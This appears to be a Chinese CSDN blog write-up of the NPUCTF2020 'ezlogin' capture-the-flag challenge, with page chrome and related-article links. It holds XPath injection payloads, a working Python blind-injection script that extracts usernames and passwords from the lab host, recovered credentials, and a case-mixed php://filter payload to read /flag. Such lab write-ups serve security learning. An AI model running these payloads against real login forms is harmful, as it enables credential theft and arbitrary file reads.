xpath注入[NPUCTF2020]ezlogin

最新推荐文章于 2024-05-31 23:11:29 发布
最新推荐文章于 2024-05-31 23:11:29 发布
阅读量663 收藏
点赞数
文章标签: 数据库 服务器 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128959974
版权

[NPUCTF2020]ezlogin

打开界面

如果发现自己输入的信息由这样构成,可以往xpath注入上靠一下。

 

不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。

 这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢

username=' ' or count(/)=1 or 1='1 ' and password=1

false or true or true and false   ,如果是两个   false or true and false 不就是false了吗

这条命令是判断根目录有几个结点, 

通过不同的回显,这道题采用盲注的手段通过回显位来判断。

 

 

一、获取根目录名字


'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>

 二、获取根目录上面的目录个数

 依次类推就可以判断n次目录下面的 子目录

三、获取目录名字的长度

'or string-length(name(/*[1]))=4 or ' '='

这样xpath基本操作就都了解了

id:        'or substring(name(/root/accounts/user/*[1]), {}, 1)='{}'  or ''=''or     username:        substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or ''=''or password:         substring(name(/root/accounts/user/*[3]), {}, 1)='{}' or ''='

 

import requests
import re
import time
s = requests.session()
url ='http://50869d19-fe92-4610-9af0-a294499acdf9.node4.buuoj.cn:81/login.php'
head ={
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')
strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
flag =''
for i in range(1,100):
    for j in strs:
        r = s.post(url=url)
        token = find.findall(r.text)
        #猜测根节点名称
        #payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #猜测子节点名称
       # payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        # #猜测accounts的节点
        # payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        # #猜测user节点
        #payload_4 ="<username>'or substring(name(/root/accounts/user/*[3]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        # #跑用户名和密码
       # payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #

        print(payload_password)
        r = s.post(url=url,headers=head,data=payload_password)
        time.sleep(0.2)
        print(r.text)


        if "非法操作" in r.text:
            flag+=j
            print(flag)
            break

    if "用户名或密码错误!" in r.text:
        break

print(flag)

一般都是md5存储数据的解密得到 

adm1n
gtfly123  cf7414b5bdb2e65ee43083f4ddbc4d9f
 

有的时候会因为网络报错,加一个time.sleep就可以了。

进入后发现,file=可能有路径穿越漏洞,或者任意文件读取漏洞

然后下面base64解码得到,flag  in /flag

直接用filter读取协议试一下

phP://filter/convert.bAse64-encode/resource=/flag

PHP://filter/string.toupper/resource=/flag   转换为大写都可以绕过

 

 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java xpath 解析xml字符串_【缺陷周话】第 18期 — XPath 注入
weixin_34093995的博客
12-26 683
聚焦源代码安全,网罗国内外最新资讯!*声明:《缺陷周话》栏目系列文章由360代码卫士团队原创出品。未经许可,禁止转载。代码审计是使用静态分析发现源代码中安全缺陷的方法,能够辅助开发或测试人员在软件上线前较为全面地了解其安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并且已经成为安全开发生命周期SDL和DevSecOps等保障体系的重要技术手段。360代码卫士团队...
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 704
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin
怪味巧克力的博客
07-16 1189
0x01 首页如上,是一个登录的页面,而且这个页面是有时间限制的,超过一定时间没登录就需要刷新页面重新登录。我们抓包看看 登录的时候一个session只能存在一定的时间,通过抓包的内容来看,这里要用到Xpath的知识点 关于Xpath参考https://www.cnblogs.com/backlion/p/8554749.html xpath注入主要有两种,一种是普通的注入,另外一种是布尔注入。普通注入对应union注入,使用|来完成和union类似的功能,布尔注入则是布尔盲注。 这里使用大佬的脚本爆破
青少年CTF练习平台 EzLogin exp
最新发布
2301_80395418的博客
05-31 263
【代码】青少年CTF练习平台 EzLogin exp。
xpath注入漏洞
leekos的博客,分享web安全相关知识~
07-24 267
今天碰到一个ctf题目,是有关xpath盲注的,之前从没了解过,所以学习了一下,写博客记录下来XPath即为XML路径语言,它是一种用来确定XML文档中某部分位置的语言。XPath基于XML的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力xpath注入类似于sql注入,是由于解释器的容错特性导致,当网站使用未经正确处理的用户输入查询 XML 数据时,可能发生 XPATH 注入easy,不难,熟练一下就好了,重要的要写盲注脚本。
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 610
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
测试XPath注入.docx
09-06
测试XPath注入 XPath 注入是指攻击者通过提交恶意的 XPath 查询来破坏应用程序的逻辑或获取未授权访问的数据的安全漏洞。XPath 是一种用于导航 XML 文档并从中获取数据的解释型语言。许多时候,一个 XPath 表达式...
xcat:XPath注入工具
05-02
XCat是一个命令行工具,可以利用和调查XPath盲注漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择注射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的...
xxxpwn:高级 XPath 注入工具
06-09
xxxpwn : XPath 过滤扩展工具 : 专为盲优化 XPath 1 注入攻击而设计 xxxpwn 使用各种 XPath 优化来查询来自存在 XPath 注入的位置提供的后端 XML 文档的自定义信息。 默认情况下,它会尝试检索整个远程数据库,尽管...
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
Xpath注入攻击及其防御技术研究
10-10
Xpath注入攻击及其防御技术研究 详细解释xpath攻击类型 与预防方法
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
从MySQL注入XPath注入
m0_69305074的博客
04-28 1040
0x00 XPath基础知识 这个部分只是单纯铺垫XPath基础知识,不涉及注入,了解XPath可以跳过 这里直接引用 w3school的XPath教程 中间的案例,因为里面给了好多示例,基本一看就懂的那种。 XPath是什么? XPath是用来从XML文档中进行查找信息的语言。 XPath节点(Node) XPath中有7种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根)节点 这个没有太大了解的必要,知道节点这个名词就够了,不需要分得特别细致。 选取节点 后面都以..
应用安全系列之四:XPATH注入
jimmyleeee的专栏
02-26 1483
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 XPath即XML路径语言(XML Path Language),是一种用来确定XML文档中某部分位置的语言。XPath基于XML的树状结构,提供在数据结构树中寻找节点的能力。XPath提出的初衷是将其作为一个通用的、介于XPointer与XSL之间的语法模型。 XPath使用路径表达式在 XML 文档中进行导航。 XPa
2022美团网络安全高校挑战赛(初赛)babyjava(XPath注入)
weixin_63231007的博客
09-18 1383
xpath=user1' and substring(/root/user/username[1]/text(),1,1)='a' and ''=' #测username[1]xpath=user1' and substring(name(/root/*),1,1)='r' and ''=' # 盲注得到结点名为user。xpath=user1' and substring(name(/*),1,1)='r' and ''=' # 盲注得到结点名为root。盲注得出,username[1]为user1。
安全测试之XPath注入攻击
热门推荐
小太阳~
01-26 1万+
一、XPath注入攻击的概念Xpath注入攻击本质上和SQL注入攻击是类似的,都是输入一些恶意的查询等代码字符串,从而对网站进行攻击。 XPath注入攻击,是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法,它允许攻击者在事先不知道XPath查询相关
xpath注入详解
weixin_30822451的博客
03-13 463
0x01 什么是xpath XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。 XPath基于XML的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在XML文档中对元素和属性进行遍历。 XPath 使用路径表达式来选取 X...
web安全学习指南(红队安全技能栈)
A_991128a的博客
03-14 328
​ 无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。可以根据自身情况,选择技术栈的发展方向。内网扫描神器,go语言跨平台,效率快,支持各类口令爆破,还有主机识别和web服务识别。可以提取流量中用户名&密码,NTML Hash,图片等,以及绘制网络拓扑。
SQL 注入XPath 注入、代码注入 示例
06-09
这就是 XPath 注入攻击的典型案例。 代码注入示例: 假设我们有一个执行用户输入的代码的功能,对应的代码为: ``` string code = Request.Params["code"]; object result = Eval(code); ``` 攻击者可以通过输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值